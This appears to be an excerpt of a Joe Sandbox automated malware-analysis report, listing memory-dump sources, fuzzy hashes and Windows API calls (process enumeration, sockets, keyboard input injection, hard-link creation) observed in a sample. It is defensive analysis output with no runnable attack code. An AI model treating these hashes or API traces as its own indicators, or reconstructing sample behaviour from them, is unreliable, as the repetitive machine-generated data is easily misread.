                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                                                                                    • String ID: msctls_updown32
                                                                                                                                                                                                                                                                                                    • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                                                                    • Opcode ID: 3d4d40b0f54769599371271f965bbf0f11523a23bc1f6d2158838eac2bd2067f
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1b1e7aac640641c2f42a643b7211b0c8ef8c3775264d8fbd2cd662062a380b2c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d4d40b0f54769599371271f965bbf0f11523a23bc1f6d2158838eac2bd2067f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE2190B5A00649AFDB00DF64CCC1EBB37ADEB5A364B000159F9019B3A1CB70EC42CBA0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00AA42DC
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00AA42EC
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00AA4312
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                                                    • String ID: Listbox
                                                                                                                                                                                                                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00A8544D
                                                                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00A854A1
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,00AADCD0), ref: 00A85515
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                                    • String ID: %lu
                                                                                                                                                                                                                                                                                                    • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00AA4CED
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00AA4D02
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00AA4D0F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A18577: _wcslen.LIBCMT ref: 00A1858A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A736F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A73712
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A736F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A73723
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A736F4: GetCurrentThreadId.KERNEL32 ref: 00A7372A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A736F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00A73731
                                                                                                                                                                                                                                                                                                    • GetFocus.USER32 ref: 00A738C4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7373B: GetParent.USER32(00000000), ref: 00A73746
                                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00A7390F
                                                                                                                                                                                                                                                                                                    • EnumChildWindows.USER32(?,00A73987), ref: 00A73937
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: %s%d
                                                                                                                                                                                                                                                                                                    • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00AA6360
                                                                                                                                                                                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00AA638D
                                                                                                                                                                                                                                                                                                    • DrawMenuBar.USER32(?), ref: 00AA639C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                    • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                                                    • Opcode ID: 07465a936771a277428c2f0a91c89636672e9cd05a0f8b7b8451146efe5197a5
                                                                                                                                                                                                                                                                                                    • Instruction ID: ed701ccbdda33b5e52619851cc3663b84435b64a3ed2161f54e48a3c3296c678
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07465a936771a277428c2f0a91c89636672e9cd05a0f8b7b8451146efe5197a5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E016D71900219AFDF119F51DC84FAEBBB4FB46355F148099F84ADA190DB308A86EF31
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00A6E797
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 00A6E7BD
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                                                    • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                                                                                    • API String ID: 3013587201-2590602151
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9b8254448063c2c4ad9a29584ccf4dd5cd0750d90720b549a0e4bbeccb3a50d0
                                                                                                                                                                                                                                                                                                    • Instruction ID: 496ca40d005503ce49977962c925cf5a2e175cbc03bb2caf78d5c9f486840110
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b8254448063c2c4ad9a29584ccf4dd5cd0750d90720b549a0e4bbeccb3a50d0
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7E09B799025319FD772D7649C44FA93234AF11701B150665EC43E6150EB35CD458A55
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9e48058c280656daff227697510b364b10003d136bfcd2523da8cc2de83a3508
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1b44c692170e0d121c318409025791e18c55e506bd78f37a951a519892a2c03f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e48058c280656daff227697510b364b10003d136bfcd2523da8cc2de83a3508
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAC13A75A00206EFDB15CF98C894EAAB7B5FF88704F15C598E50AEB251D731EE81CB90
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6af1447657319e270210b4c67689e4a4b88e14a5cff05e06e13d41d0a13b36d3
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3BA17A7A9007869FEB21CF28C8917AEBBE4FF99314F2441ADE9959F281C3789D41C750
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00AB0BD4,?), ref: 00A70EE0
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00AB0BD4,?), ref: 00A70EF8
                                                                                                                                                                                                                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,00AADCE0,000000FF,?,00000000,00000800,00000000,?,00AB0BD4,?), ref: 00A70F1D
                                                                                                                                                                                                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 00A70F3E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 314563124-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00A9B10C
                                                                                                                                                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00A9B11A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00A9B1FC
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00A9B20B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A2E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00A54D73,?), ref: 00A2E395
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1991900642-0
                                                                                                                                                                                                                                                                                                    APIs
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00A9255A
                                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00A92568
                                                                                                                                                                                                                                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00A925E7
                                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00A925F1
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00AA6D1A
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00AA6D4D
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00AA6DBA
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: fc17056b3319235f3d5f072fd00ecf14fa862fba8c47de72bb3025c3d3d0a5af
                                                                                                                                                                                                                                                                                                    • Instruction ID: 150e0200b22923dafc9d2bdffe742bcd92623e6e2adf0dfe788936c81a2893c4
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc17056b3319235f3d5f072fd00ecf14fa862fba8c47de72bb3025c3d3d0a5af
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92411679A10704AFD725AF78CD42BAABBEDEFC8710F10852AF111DB291D771D91187A0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00A861C8
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00A861EE
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00A86213
                                                                                                                                                                                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00A8623F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: cf252bf8cc0f66e0232b0ffc23ebe077e6e346c7f02fe0ca540fb61e7a73a642
                                                                                                                                                                                                                                                                                                    • Instruction ID: b1c19ada86b775e193c28394e870200b96eb1c38b79aa0bb46f2ab6fdfa49cd5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf252bf8cc0f66e0232b0ffc23ebe077e6e346c7f02fe0ca540fb61e7a73a642
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5414E35600611DFCB11EF54C645A9DBBE2FF8A710B188488E84A9B3A2CB34FD41CB91
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00A7B473
                                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(00000080), ref: 00A7B48F
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00A7B4FD
                                                                                                                                                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00A7B54F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9316ec83bdfba6215869e1fa0b734d970b6c395bbb63600af8d13729a7234cdd
